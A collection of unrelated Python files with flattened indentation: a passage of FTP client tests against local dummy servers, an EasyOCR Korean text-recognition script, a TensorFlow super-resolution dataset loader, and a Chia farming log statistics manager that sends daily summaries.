def test_rename(self):
self.client.rename('a', 'b')
self.server.handler_instance.next_response = '200'
self.assertRaises(ftplib.error_reply, self.client.rename, 'a', 'b')
def test_delete(self):
self.client.delete('foo')
self.server.handler_instance.next_response = '199'
self.assertRaises(ftplib.error_reply, self.client.delete, 'foo')
def test_size(self):
self.client.size('foo')
def test_mkd(self):
dir = self.client.mkd('/foo')
self.assertEqual(dir, '/foo')
def test_rmd(self):
self.client.rmd('foo')
def test_cwd(self):
dir = self.client.cwd('/foo')
self.assertEqual(dir, '250 cwd ok')
def test_pwd(self):
dir = self.client.pwd()
self.assertEqual(dir, 'pwd ok')
def test_quit(self):
self.assertEqual(self.client.quit(), '221 quit ok')
# Ensure the connection gets closed; sock attribute should be None
self.assertEqual(self.client.sock, None)
def test_abort(self):
self.client.abort()
def test_retrbinary(self):
def callback(data):
received.append(data.decode('ascii'))
received = []
self.client.retrbinary('retr', callback)
self.check_data(''.join(received), RETR_DATA)
def test_retrbinary_rest(self):
def callback(data):
received.append(data.decode('ascii'))
for rest in (0, 10, 20):
received = []
self.client.retrbinary('retr', callback, rest=rest)
self.check_data(''.join(received), RETR_DATA[rest:])
def test_retrlines(self):
received = []
self.client.retrlines('retr', received.append)
self.check_data(''.join(received), RETR_DATA.replace('\r\n', ''))
def test_storbinary(self):
f = io.BytesIO(RETR_DATA.encode('ascii'))
self.client.storbinary('stor', f)
self.check_data(self.server.handler_instance.last_received_data, RETR_DATA)
# test new callback arg
flag = []
f.seek(0)
self.client.storbinary('stor', f, callback=lambda x: flag.append(None))
self.assertTrue(flag)
def test_storbinary_rest(self):
f = io.BytesIO(RETR_DATA.replace('\r\n', '\n').encode('ascii'))
for r in (30, '30'):
f.seek(0)
self.client.storbinary('stor', f, rest=r)
self.assertEqual(self.server.handler_instance.rest, str(r))
def test_storlines(self):
f = io.BytesIO(RETR_DATA.replace('\r\n', '\n').encode('ascii'))
self.client.storlines('stor', f)
self.check_data(self.server.handler_instance.last_received_data, RETR_DATA)
# test new callback arg
flag = []
f.seek(0)
self.client.storlines('stor foo', f, callback=lambda x: flag.append(None))
self.assertTrue(flag)
f = io.StringIO(RETR_DATA.replace('\r\n', '\n'))
# storlines() expects a binary file, not a text file
with support.check_warnings(('', BytesWarning), quiet=True):
self.assertRaises(TypeError, self.client.storlines, 'stor foo', f)
def test_nlst(self):
self.client.nlst()
self.assertEqual(self.client.nlst(), NLST_DATA.split('\r\n')[:-1])
def test_dir(self):
l = []
self.client.dir(lambda x: l.append(x))
self.assertEqual(''.join(l), LIST_DATA.replace('\r\n', ''))
def test_mlsd(self):
list(self.client.mlsd())
list(self.client.mlsd(path='/'))
list(self.client.mlsd(path='/', facts=['size', 'type']))
ls = list(self.client.mlsd())
for name, facts in ls:
self.assertIsInstance(name, str)
self.assertIsInstance(facts, dict)
self.assertTrue(name)
self.assertIn('type', facts)
self.assertIn('perm', facts)
self.assertIn('unique', facts)
def set_data(data):
self.server.handler_instance.next_data = data
def test_entry(line, type=None, perm=None, unique=None, name=None):
type = 'type' if type is None else type
perm = 'perm' if perm is None else perm
unique = 'unique' if unique is None else unique
name = 'name' if name is None else name
set_data(line)
_name, facts = next(self.client.mlsd())
self.assertEqual(_name, name)
self.assertEqual(facts['type'], type)
self.assertEqual(facts['perm'], perm)
self.assertEqual(facts['unique'], unique)
# plain
test_entry('type=type;perm=perm;unique=unique; name\r\n')
# "=" in fact value
test_entry('type=ty=pe;perm=perm;unique=unique; name\r\n', type="ty=pe")
test_entry('type==type;perm=perm;unique=unique; name\r\n', type="=type")
test_entry('type=t=y=pe;perm=perm;unique=unique; name\r\n', type="t=y=pe")
test_entry('type=====;perm=perm;unique=unique; name\r\n', type="====")
# spaces in name
test_entry('type=type;perm=perm;unique=unique; na me\r\n', name="na me")
test_entry('type=type;perm=perm;unique=unique; name \r\n', name="name ")
test_entry('type=type;perm=perm;unique=unique; name\r\n', name=" name")
test_entry('type=type;perm=perm;unique=unique; n am e\r\n', name="n am e")
# ";" in name
test_entry('type=type;perm=perm;unique=unique; na;me\r\n', name="na;me")
test_entry('type=type;perm=perm;unique=unique; ;name\r\n', name=";name")
test_entry('type=type;perm=perm;unique=unique; ;name;\r\n', name=";name;")
test_entry('type=type;perm=perm;unique=unique; ;;;;\r\n', name=";;;;")
# case sensitiveness
set_data('Type=type;TyPe=perm;UNIQUE=unique; name\r\n')
_name, facts = next(self.client.mlsd())
for x in facts:
self.assertTrue(x.islower())
# no data (directory empty)
set_data('')
self.assertRaises(StopIteration, next, self.client.mlsd())
set_data('')
for x in self.client.mlsd():
self.fail("unexpected data %s" % data)
def test_makeport(self):
with self.client.makeport():
# IPv4 is in use, just make sure send_eprt has not been used
self.assertEqual(self.server.handler_instance.last_received_cmd,
'port')
def test_makepasv(self):
host, port = self.client.makepasv()
conn = socket.create_connection((host, port), 10)
conn.close()
# IPv4 is in use, just make sure send_epsv has not been used
self.assertEqual(self.server.handler_instance.last_received_cmd, 'pasv')
def test_with_statement(self):
self.client.quit()
def is_client_connected():
if self.client.sock is None:
return False
try:
self.client.sendcmd('noop')
except (socket.error, EOFError):
return False
return True
# base test
with ftplib.FTP(timeout=2) as self.client:
self.client.connect(self.server.host, self.server.port)
self.client.sendcmd('noop')
self.assertTrue(is_client_connected())
self.assertEqual(self.server.handler_instance.last_received_cmd, 'quit')
self.assertFalse(is_client_connected())
# QUIT sent inside the with block
with ftplib.FTP(timeout=2) as self.client:
self.client.connect(self.server.host, self.server.port)
self.client.sendcmd('noop')
self.client.quit()
self.assertEqual(self.server.handler_instance.last_received_cmd, 'quit')
self.assertFalse(is_client_connected())
# force a wrong response code to be sent on QUIT: error_perm
# is expected and the connection is supposed to be closed
try:
with ftplib.FTP(timeout=2) as self.client:
self.client.connect(self.server.host, self.server.port)
self.client.sendcmd('noop')
self.server.handler_instance.next_response = '550 error on quit'
except ftplib.error_perm as err:
self.assertEqual(str(err), '550 error on quit')
else:
self.fail('Exception not raised')
# needed to give the threaded server some time to set the attribute
# which otherwise would still be == 'noop'
time.sleep(0.1)
self.assertEqual(self.server.handler_instance.last_received_cmd, 'quit')
self.assertFalse(is_client_connected())
def test_source_address(self):
self.client.quit()
port = support.find_unused_port()
try:
self.client.connect(self.server.host, self.server.port,
source_address=(HOST, port))
self.assertEqual(self.client.sock.getsockname()[1], port)
self.client.quit()
except IOError as e:
if e.errno == errno.EADDRINUSE:
self.skipTest("couldn't bind to port %d" % port)
raise
def test_source_address_passive_connection(self):
port = support.find_unused_port()
self.client.source_address = (HOST, port)
try:
with self.client.transfercmd('list') as sock:
self.assertEqual(sock.getsockname()[1], port)
except IOError as e:
if e.errno == errno.EADDRINUSE:
self.skipTest("couldn't bind to port %d" % port)
raise
def test_parse257(self):
self.assertEqual(ftplib.parse257('257 "/foo/bar"'), '/foo/bar')
self.assertEqual(ftplib.parse257('257 "/foo/bar" created'), '/foo/bar')
self.assertEqual(ftplib.parse257('257 ""'), '')
self.assertEqual(ftplib.parse257('257 "" created'), '')
self.assertRaises(ftplib.error_reply, ftplib.parse257, '250 "/foo/bar"')
# The 257 response is supposed to include the directory
# name and in case it contains embedded double-quotes
# they must be doubled (see RFC-959, chapter 7, appendix 2).
self.assertEqual(ftplib.parse257('257 "/foo/b""ar"'), '/foo/b"ar')
self.assertEqual(ftplib.parse257('257 "/foo/b""ar" created'), '/foo/b"ar')
def test_line_too_long(self):
self.assertRaises(ftplib.Error, self.client.sendcmd,
'x' * self.client.maxline * 2)
def test_retrlines_too_long(self):
self.client.sendcmd('SETLONGRETR %d' % (self.client.maxline * 2))
received = []
self.assertRaises(ftplib.Error,
self.client.retrlines, 'retr', received.append)
def test_storlines_too_long(self):
f = io.BytesIO(b'x' * self.client.maxline * 2)
self.assertRaises(ftplib.Error, self.client.storlines, 'stor', f)
@skipUnless(support.IPV6_ENABLED, "IPv6 not enabled")
class TestIPv6Environment(TestCase):
def setUp(self):
self.server = DummyFTPServer((HOSTv6, 0), af=socket.AF_INET6)
self.server.start()
self.client = ftplib.FTP()
self.client.connect(self.server.host, self.server.port)
def tearDown(self):
self.client.close()
self.server.stop()
def test_af(self):
self.assertEqual(self.client.af, socket.AF_INET6)
def test_makeport(self):
with self.client.makeport():
self.assertEqual(self.server.handler_instance.last_received_cmd,
'eprt')
def test_makepasv(self):
host, port = self.client.makepasv()
conn = socket.create_connection((host, port), 10)
conn.close()
self.assertEqual(self.server.handler_instance.last_received_cmd, 'epsv')
def test_transfer(self):
def retr():
def callback(data):
received.append(data.decode('ascii'))
received = []
self.client.retrbinary('retr', callback)
self.assertEqual(len(''.join(received)), len(RETR_DATA))
self.assertEqual(''.join(received), RETR_DATA)
self.client.set_pasv(True)
retr()
self.client.set_pasv(False)
retr()
@skipUnless(ssl, "SSL not available")
class TestTLS_FTPClassMixin(TestFTPClass):
"""Repeat TestFTPClass tests starting the TLS layer for both control
and data connections first.
"""
def setUp(self):
self.server = DummyTLS_FTPServer((HOST, 0))
self.server.start()
self.client = ftplib.FTP_TLS(timeout=2)
self.client.connect(self.server.host, self.server.port)
# enable TLS
self.client.auth()
self.client.prot_p()
@skipUnless(ssl, "SSL not available")
class TestTLS_FTPClass(TestCase):
"""Specific TLS_FTP class tests."""
def setUp(self):
self.server = DummyTLS_FTPServer((HOST, 0))
self.server.start()
self.client = ftplib.FTP_TLS(timeout=2)
self.client.connect(self.server.host, self.server.port)
def tearDown(self):
self.client.close()
self.server.stop()
def test_control_connection(self):
self.assertNotIsInstance(self.client.sock, ssl.SSLSocket)
self.client.auth()
self.assertIsInstance(self.client.sock, ssl.SSLSocket)
def test_data_connection(self):
# clear text
with self.client.transfercmd('list') as sock:
self.assertNotIsInstance(sock, ssl.SSLSocket)
self.assertEqual(self.client.voidresp(), "226 transfer complete")
# secured, after PROT P
self.client.prot_p()
with self.client.transfercmd('list') as sock:
self.assertIsInstance(sock, ssl.SSLSocket)
self.assertEqual(self.client.voidresp(), "226 transfer complete")
# PROT C is issued, the connection must be in cleartext again
self.client.prot_c()
with self.client.transfercmd('list') as sock:
self.assertNotIsInstance(sock, ssl.SSLSocket)
self.assertEqual(self.client.voidresp(), "226 transfer complete")
def test_login(self):
# login() is supposed to implicitly secure the control connection
self.assertNotIsInstance(self.client.sock, ssl.SSLSocket)
self.client.login()
self.assertIsInstance(self.client.sock, ssl.SSLSocket)
# make sure that AUTH TLS doesn't get issued again
self.client.login()
def test_auth_issued_twice(self):
self.client.auth()
self.assertRaises(ValueError, self.client.auth)
def test_auth_ssl(self):
try:
self.client.ssl_version = ssl.PROTOCOL_SSLv3
self.client.auth()
self.assertRaises(ValueError, self.client.auth)
finally:
self.client.ssl_version = ssl.PROTOCOL_TLSv1
def test_context(self):
self.client.quit()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertRaises(ValueError, ftplib.FTP_TLS, keyfile=CERTFILE,
context=ctx)
self.assertRaises(ValueError, ftplib.FTP_TLS, certfile=CERTFILE,
context=ctx)
self.assertRaises(ValueError, ftplib.FTP_TLS, certfile=CERTFILE,
keyfile=CERTFILE, context=ctx)
self.client = ftplib.FTP_TLS(context=ctx, timeout=2)
self.client.connect(self.server.host, self.server.port)
self.assertNotIsInstance(self.client.sock, ssl.SSLSocket)
self.client.auth()
self.assertIs(self.client.sock.context, ctx)
self.assertIsInstance(self.client.sock, ssl.SSLSocket)
self.client.prot_p()
with self.client.transfercmd('list') as sock:
self.assertIs(sock.context, ctx)
self.assertIsInstance(sock, ssl.SSLSocket)
def test_ccc(self):
self.assertRaises(ValueError, self.client.ccc)
self.client.login(secure=True)
self.assertIsInstance(self.client.sock, ssl.SSLSocket)
self.client.ccc()
self.assertRaises(ValueError, self.client.sock.unwrap)
class TestTimeouts(TestCase):
def setUp(self):
self.evt = threading.Event()
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.settimeout(20)
self.port = support.bind_port(self.sock)
self.server_thread = threading.Thread(target=self.server)
self.server_thread.start()
# Wait for the server to be ready.
self.evt.wait()
self.evt.clear()
self.old_port = ftplib.FTP.port
ftplib.FTP.port = self.port
def tearDown(self):
ftplib.FTP.port = self.old_port
self.server_thread.join()
def server(self):
# This method sets the evt 3 times:
# 1) when the connection is ready to be accepted.
# 2) when it is safe for the caller to close the connection
# 3) when we have closed the socket
self.sock.listen(5)
# (1) Signal the caller that we are ready to accept the connection.
self.evt.set()
try:
conn, addr = self.sock.accept()
except socket.timeout:
pass
else:
conn.sendall(b"1 Hola mundo\n")
conn.shutdown(socket.SHUT_WR)
# (2) Signal the caller that it is safe to close the socket.
self.evt.set()
conn.close()
finally:
self.sock.close()
def testTimeoutDefault(self):
# default -- use global socket timeout
self.assertIsNone(socket.getdefaulttimeout())
socket.setdefaulttimeout(30)
try:
ftp = ftplib.FTP(HOST)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
def testTimeoutNone(self):
# no timeout -- do not use global socket timeout
self.assertIsNone(socket.getdefaulttimeout())
socket.setdefaulttimeout(30)
try:
ftp = ftplib.FTP(HOST, timeout=None)
finally:
socket.setdefaulttimeout(None)
self.assertIsNone(ftp.sock.gettimeout())
self.evt.wait()
ftp.close()
def testTimeoutValue(self):
# a value
ftp = ftplib.FTP(HOST, timeout=30)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
def testTimeoutConnect(self):
ftp = ftplib.FTP()
ftp.connect(HOST, timeout=30)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
def testTimeoutDifferentOrder(self):
ftp = ftplib.FTP(timeout=30)
ftp.connect(HOST)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
def testTimeoutDirectAccess(self):
ftp = ftplib.FTP()
ftp.timeout = 30
ftp.connect(HOST)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
def test_main():
tests = [TestFTPClass, TestTimeouts,
TestIPv6Environment,
TestTLS_FTPClassMixin, TestTLS_FTPClass]
thread_info = support.threading_setup()
try:
support.run_unittest(*tests)
finally:
support.threading_cleanup(*thread_info)
if __name__ == '__main__':
test_main()
|
run.py
|
import cv2 as cv
import numpy as np
from easyocr.easyocr import *
from PIL import ImageFont, ImageDraw, Image
from video_processing_parallel import WebcamStream
import time
from threading import Thread # library for implementing multi-threaded processing
# GPU 설정
os.environ['CUDA_VISIBLE_DEVICES'] = '0,1'
def get_files(path):
file_list = []
lists = [f for f in os.listdir(path) if not f.startswith('.')] # skip hidden file
lists.sort()
abspath = os.path.abspath(path)
for onelist in lists:
file_path = os.path.join(abspath, onelist)
file_list.append(file_path)
return file_list, len(file_list)
def put_test(img, str_text, filename):
# 한글 깨짐
# font = cv.FONT_HERSHEY_SIMPLEX
# bottomLeftCornerOfText = (10, 500)
# fontScale = 1
# fontColor = (0, 0, 255)
# thickness = 1
# lineType = 2
#
# cv.putText(img, str_text,
# bottomLeftCornerOfText,
# font,
# fontScale,
# fontColor,
# thickness,
# lineType)
bottomLeftCornerOfText = (10, 500)
font = ImageFont.truetype("fonts/gulim.ttc", 20)
##text_img = np.full((200,300,3), (0, 0, 255), np.unit8)
img = Image.fromarray(img)
draw = ImageDraw.Draw(img)
draw.text(bottomLeftCornerOfText, str_text, font=font, fill=(0,0,0))
img = np.array(img)
cv.imshow(filename, img)
def get_text(img_color):
result = reader.readtext(img_color)
print("result.__len__():", result.__len__())
if result.__len__() > 0:
# ./easyocr/utils.py 733 lines
# result[0]: bbox
# result[1]: string
# result[2]: confidence
for idx, (bbox, string, confidence) in enumerate(result):
print("confidence: %.4f, string: '%s'" % (confidence, string))
# print('bbox: ', bbox)
if True:
cv.rectangle(img_color, (int(bbox[0][0]), int(bbox[0][1])), (int(bbox[2][0]), int(bbox[2][1])), (0, 0, 255),
3)
# put_test(img, string, filename)
bottomLeftCornerOfText = (int(bbox[0][0]), int(bbox[0][1]) - 30)
# font = ImageFont.truetype("fonts/gulim.ttc", 20)
##text_img = np.full((200,300,3), (0, 0, 255), np.unit8)
img_color = Image.fromarray(img_color)
draw = ImageDraw.Draw(img_color)
w, h = font.getsize(string)
draw.rectangle((int(bbox[0][0]), int(bbox[0][1]) - 30, int(bbox[0][0]) + w, int(bbox[0][1]) - 30 + h),
fill='gray')
draw.text(bottomLeftCornerOfText, string, font=font, fill=(0, 255, 255))
img_color = np.array(img_color)
if idx == 4:
cv.imshow("test", img_color)
cv.waitKey(0)
cv.destroyWindow("test")
if __name__ == '__main__':
if False:
# cap = cv.VideoCapture(0)
webcam_stream = WebcamStream(stream_id=0) # stream_id = 0 is for primary camera
webcam_stream.start()
reader = Reader(['ko', 'en'], gpu=False,
model_storage_directory='./model',
user_network_directory='./user_network',
# recog_network='TPS-ResNet-BiLSTM-CTC-0311-wild')
# # recog_network='TPS-ResNet-BiLSTM-Attn-0316-wild')
recog_network='TPS-ResNet-BiLSTM-Attn-wild-syllable-0317')
# recog_network='TPS-ResNet-BiLSTM-CTC-syllable-word-0316')
font = ImageFont.truetype("fonts/gulim.ttc", 30)
while(True):
# ret, img_color = cap.read()
img_color = webcam_stream.read()
height, width = img_color.shape[:2]
img_color = cv.resize(img_color, (width, height), interpolation=cv.INTER_AREA)
# img_color = cv.flip(img_color, 1) # 좌우반전
delay = 0.03 # delay value in seconds. so, delay=1 is equivalent to 1 second
# delay = 2
time.sleep(delay)
# cv.imshow("test", img_color)
# t = Thread(target=get_text, args=(img_color,))
# t.start()
key = cv.waitKey(1)
if key == ord('s'):
get_text(img_color)
# in thread
# t = Thread(target=get_text, args=(img_color,))
# t.start()
"""
result = reader.readtext(img_color)
print("result.__len__():", result.__len__())
if result.__len__() > 0:
# ./easyocr/utils.py 733 lines
# result[0]: bbox
# result[1]: string
# result[2]: confidence
for (bbox, string, confidence) in result:
print("confidence: %.4f, string: '%s'" % (confidence, string))
# print('bbox: ', bbox)
cv.rectangle(img_color, (int(bbox[0][0]), int(bbox[0][1])), (int(bbox[2][0]), int(bbox[2][1])), (0, 0, 255),3)
# put_test(img, string, filename)
bottomLeftCornerOfText = (int(bbox[0][0]), int(bbox[0][1])-30)
# font = ImageFont.truetype("fonts/gulim.ttc", 20)
##text_img = np.full((200,300,3), (0, 0, 255), np.unit8)
img_color = Image.fromarray(img_color)
draw = ImageDraw.Draw(img_color)
w, h = font.getsize(string)
draw.rectangle((int(bbox[0][0]), int(bbox[0][1])-30, int(bbox[0][0]) + w, int(bbox[0][1])-30 + h), fill='gray')
draw.text(bottomLeftCornerOfText, string, font=font, fill=(0, 255, 255))
img_color = np.array(img_color)
cv.imshow("test", img_color)
cv.waitKey(0)
cv.destroyWindow("test")
"""
# cv.waitKey(0)
# ESC 키누르면 종료
elif key == 27:
cv.destroyWindow("test")
break
else:
cv.imshow("test", img_color)
continue
webcam_stream.stop()
cv.destroyAllWindows()
else :
# # Using default model
# reader = Reader(['en'], gpu=True)
# Using custom model case english
# reader = Reader(['en'], gpu=False,
# model_storage_directory='model',
# user_network_directory='user_network',
# recog_network='custom_en')
# Using custom model case english
# reader = Reader(['ko','en'], gpu=False,
# model_storage_directory='model',
# user_network_directory='user_network',
# recog_network='custom_ko')
# try:
reader = Reader(['ko'], gpu=False,
model_storage_directory='../trainning_model/None-VGG-BiLSTM-CTC-Seed334',
# model_storage_directory='./model',
# model_storage_directory='../trainning_model',
user_network_directory='./user_network',
recog_network='best_accuracy')
# files, count = get_files('../TextRecognitionDataGenerator/out') #orig 'examples'
# files, count = get_files('examples') # orig
files, count = get_files('demo_image')
n_sucess = 0
n_fail = 0
for idx, file in enumerate(files):
filename = os.path.basename(file)
# print("file:", file )
result = reader.readtext(file, min_size=10)
time.sleep(0.2)
# ./easyocr/utils.py 733 lines
# result[0]: bbox
# result[1]: string
# result[2]: confidence
# print(result)
if result:
for (bbox, string, confidence) in result:
if filename.split('_')[0] == string:
print("[TRUE]idx: %d, filename: '%s', string: '%s', confidence: %.4f" % (idx, filename, string, confidence))
n_sucess += 1
else:
print("\t\t\t\t\t\t\t\t\t\t\t\t\t\t[FALSE]idx: %d, filename: '%s', string: '%s'" % (idx, filename, string))
n_fail += 1
print("Success Count:%d, Failure Count:%d" % (n_sucess, n_fail))
print("Success Count:%d, Failure Count:%d" % (n_sucess, n_fail))
"""
img = cv.imread(file)
for (bbox, string, confidence) in result:
if filename.split('_')[0] == string:
print("idx: %d, filename: '%s', confidence: %.4f, string: '%s', bbox: '%s'" % (idx, filename, confidence, string, bbox))
else:
print("idx: %d", idx)
# print('bbox: ', bbox)
# img = cv.imread(file)
cv.rectangle(img, (int(bbox[0][0]), int(bbox[0][1])), (int(bbox[2][0]), int(bbox[2][1])), (255, 255, 0), 3)
# put_test(img, string, filename)
# bottomLeftCornerOfText = (10, 500)
bottomLeftCornerOfText = (int(bbox[0][0]), int(bbox[0][1]) - 5)
font = ImageFont.truetype("fonts/gulim.ttc", 15)
##text_img = np.full((200,300,3), (0, 0, 255), np.unit8)
img = Image.fromarray(img)
draw = ImageDraw.Draw(img)
w, h = font.getsize(string)
draw.rectangle((int(bbox[0][0]), int(bbox[0][1]) - 5, int(bbox[0][0]) + w, int(bbox[0][1]) - 5 + h), fill='black')
draw.text(bottomLeftCornerOfText, string, font=font, fill=(0, 0, 255))
img = np.array(img)
cv.imshow(filename, img)
cv.waitKey(0)
cv.destroyAllWindows()
"""
# except Exception as e: # 모든 예외의 에러 메시지를 출력할 때는 Exception을 사용
# print('예외가 발생했습니다.', e)
|
dataset.py
|
import os
import tensorflow as tf
import numpy as np
from PIL import Image
import time
import threading
class Dataset(object):
def __init__(self, args):
self.train_directory = args.train_directory
self.validation_directory = args.validation_directory
self.batch_size = args.batch_size
self.train_list = os.listdir(self.train_directory)
self.test_list = os.listdir(self.validation_directory)
assert len(self.train_list) > 0 and len(self.test_list) > 0, 'Empty dataset'
self.test_i = 0
self.patch_size = args.patch_size # HR patch size
self.queue_size = 256
self.make_queue()
def make_queue(self):
image_shape_hr = (self.patch_size, self.patch_size, 3)
image_shape_lr = (self.patch_size//2, self.patch_size//2, 3)
image_shape_lr_ = (self.patch_size//4, self.patch_size//4, 3)
self.maml_img_lr = tf.placeholder(tf.float32, (None,) + image_shape_lr)
self.maml_img_bicubic = tf.placeholder(tf.float32, (None,) + image_shape_hr)
self.maml_img_hr = tf.placeholder(tf.float32, (None,) + image_shape_hr)
self.img_lr = tf.placeholder(tf.float32, (None,) + image_shape_lr_)
self.img_bicubic = tf.placeholder(tf.float32, (None,) + image_shape_lr)
self.img_hr = tf.placeholder(tf.float32, (None,) + image_shape_lr)
# Dequeues element in random order
queue = tf.RandomShuffleQueue(self.queue_size, self.batch_size,
dtypes=(tf.float32, tf.float32, tf.float32, tf.float32, tf.float32, tf.float32),
shapes=(image_shape_lr_, image_shape_lr, image_shape_lr,
image_shape_lr, image_shape_hr, image_shape_hr))
self.enqueue_many = queue.enqueue_many([self.img_lr, self.img_bicubic, self.img_hr,
self.maml_img_lr, self.maml_img_bicubic, self.maml_img_hr])
self.dequeue_many = queue.dequeue_many(self.batch_size)
def start_enqueue_daemon(self, sess):
def enqueue_thread(sess):
while(True):
img_lr, img_bicubic, img_hr, maml_img_lr, maml_img_bicubic, maml_img_hr \
= self.next(test=False)
sess.run([self.enqueue_many], feed_dict={
self.img_lr: img_lr,
self.img_bicubic: img_bicubic,
self.img_hr: img_hr,
self.maml_img_lr: maml_img_lr,
self.maml_img_bicubic: maml_img_bicubic,
self.maml_img_hr: maml_img_hr
})
time.sleep(0.02)
thread_number = 1
threads = []
for i in range(thread_number):
t = threading.Thread(target=enqueue_thread, args=(sess,), daemon=True)
t.start()
threads.append(t)
return threads
def augmentation(self, input_img):
'''
input_img: Pillow Image object
returns: Pillow Image object
'''
aug_methods = [
Image.FLIP_LEFT_RIGHT, Image.FLIP_TOP_BOTTOM,
Image.ROTATE_90, Image.ROTATE_180,
Image.ROTATE_270, Image.TRANSPOSE,
Image.TRANSVERSE
]
if(np.random.randint(len(aug_methods) + 1) == 0):
return input_img
else:
return input_img.transpose(np.random.choice(aug_methods))
def choose_random_image(self, test):
if(test):
random_img = os.path.join(self.validation_directory, self.test_list[self.test_i])
self.test_i += 1
if(self.test_i >= len(self.test_list)):
self.test_i = 0
else:
random_img = os.path.join(self.train_directory, np.random.choice(self.train_list))
random_img = Image.open(random_img).convert('RGB')
random_img = random_img.crop((0, 0,
random_img.size[0] - random_img.size[0]%8, random_img.size[1] - random_img.size[1]%8
))
return random_img
def next(self, test):
if(test):
maml_hr_img = self.choose_random_image(test)
else:
#maml_hr_img = self.global_img
maml_hr_img = self.choose_random_image(test)
# patch size on HR image
if(maml_hr_img.size[1] <= self.patch_size or maml_hr_img.size[0] <= self.patch_size):
return self.next(test)
left = np.random.randint(maml_hr_img.size[0] - self.patch_size)
upper = np.random.randint(maml_hr_img.size[1] - self.patch_size)
maml_hr_img = maml_hr_img.crop((left, upper, left + self.patch_size, upper + self.patch_size))
lev2 = maml_hr_img.size
lev1 = (lev2[0]//2, lev2[1]//2)
lev0 = (lev1[0]//2, lev1[1]//2)
maml_lr_img = maml_hr_img.resize(lev1, resample=Image.BICUBIC)
maml_bicubic_img = maml_lr_img.resize(lev2, resample=Image.BICUBIC)
hr_img = maml_lr_img.copy()
lr_img = hr_img.resize(lev0, resample=Image.BICUBIC)
bicubic_img = lr_img.resize(lev1, resample=Image.BICUBIC)
maml_hr_img = np.array(maml_hr_img, dtype=np.float32, ndmin=4)
maml_lr_img = np.array(maml_lr_img, dtype=np.float32, ndmin=4)
maml_bicubic_img = np.array(maml_bicubic_img, dtype=np.float32, ndmin=4)
hr_img = np.array(hr_img, dtype=np.float32, ndmin=4)
lr_img = np.array(lr_img, dtype=np.float32, ndmin=4)
bicubic_img = np.array(bicubic_img, dtype=np.float32, ndmin=4)
return lr_img, bicubic_img, hr_img, maml_lr_img, maml_bicubic_img, maml_hr_img
|
stats_manager.py
|
# std
import logging
import re
from datetime import datetime, timedelta
from typing import cast, List, Union
from threading import Thread
from time import sleep
# project
from . import (
HarvesterActivityConsumer,
PartialConsumer,
BlockConsumer,
WalletAddedCoinConsumer,
FinishedSignageConsumer,
)
from .stat_accumulators.eligible_plots_stats import EligiblePlotsStats
from .stat_accumulators.wallet_added_coin_stats import WalletAddedCoinStats
from .stat_accumulators.search_time_stats import SearchTimeStats
from .stat_accumulators.signage_point_stats import SignagePointStats
from .stat_accumulators.found_proof_stats import FoundProofStats
from .stat_accumulators.number_plots_stats import NumberPlotsStats
from .stat_accumulators.found_partial_stats import FoundPartialStats
from .stat_accumulators.found_block_stats import FoundBlockStats
from src.chia_log.parsers.wallet_added_coin_parser import WalletAddedCoinMessage
from src.chia_log.parsers.harvester_activity_parser import HarvesterActivityMessage
from src.chia_log.parsers.finished_signage_point_parser import FinishedSignagePointMessage
from src.chia_log.parsers.partial_parser import PartialMessage
from src.chia_log.parsers.block_parser import BlockMessage
from src.notifier.notify_manager import NotifyManager
from src.notifier import Event, EventType, EventPriority, EventService
class StatsManager:
"""Manage all stat accumulators and trigger daily notification to the user
with a summary from all stats that have been collected for the past 24 hours.
"""
def __init__(self, config: dict, notify_manager: NotifyManager):
self._enable = config.get("enable", False)
self._notify_time = self._parse_notify_time(config.get("time_of_day", "21:00"))
self._frequency_hours = config.get("frequency_hours", 24)
if not self._enable:
logging.warning("Disabled stats and daily notifications")
return
logging.info("Enabled stats for daily notifications")
self._notify_manager = notify_manager
self._stat_accumulators = [
WalletAddedCoinStats(),
FoundProofStats(),
FoundPartialStats(),
FoundBlockStats(),
SearchTimeStats(),
NumberPlotsStats(),
EligiblePlotsStats(),
SignagePointStats(),
]
logging.info(
f"Summary notifications will be sent out every {self._frequency_hours} "
f"hours starting from {self._notify_time['hour']:02d}:{self._notify_time['minute']:02d}"
)
self._datetime_next_summary = datetime.now().replace(
hour=self._notify_time["hour"], minute=self._notify_time["minute"], second=0, microsecond=0
)
while datetime.now() > self._datetime_next_summary:
self._datetime_next_summary += timedelta(hours=self._frequency_hours)
# Start thread
self._is_running = True
self._thread = Thread(target=self._run_loop)
self._thread.start()
def consume_wallet_messages(self, objects: List[WalletAddedCoinMessage]):
if not self._enable:
return
for stat_acc in self._stat_accumulators:
if isinstance(stat_acc, WalletAddedCoinConsumer):
for obj in objects:
stat_acc.consume(obj)
def consume_harvester_messages(self, objects: List[HarvesterActivityMessage]):
if not self._enable:
return
for stat_acc in self._stat_accumulators:
if isinstance(stat_acc, HarvesterActivityConsumer):
for obj in objects:
stat_acc.consume(obj)
def consume_partial_messages(self, objects: List[PartialMessage]):
if not self._enable:
return
for stat_acc in self._stat_accumulators:
if isinstance(stat_acc, PartialConsumer):
for obj in objects:
stat_acc.consume(obj)
def consume_block_messages(self, objects: List[BlockMessage]):
if not self._enable:
return
for stat_acc in self._stat_accumulators:
if isinstance(stat_acc, BlockConsumer):
for obj in objects:
stat_acc.consume(obj)
def consume_signage_point_messages(self, objects: List[FinishedSignagePointMessage]):
if not self._enable:
return
for stat_acc in self._stat_accumulators:
if isinstance(stat_acc, FinishedSignageConsumer):
for obj in objects:
stat_acc.consume(obj)
def _send_daily_notification(self):
summary = f"Hello farmer! 👋 Here's what happened in the last {self._frequency_hours} hours:\n"
for stat_acc in self._stat_accumulators:
summary += "\n" + stat_acc.get_summary()
stat_acc.reset()
self._notify_manager.process_events(
[Event(type=EventType.DAILY_STATS, priority=EventPriority.LOW, service=EventService.DAILY, message=summary)]
)
def _run_loop(self):
while self._is_running:
if datetime.now() > self._datetime_next_summary:
self._send_daily_notification()
self._datetime_next_summary += timedelta(hours=self._frequency_hours)
sleep(1)
def stop(self):
self._is_running = False
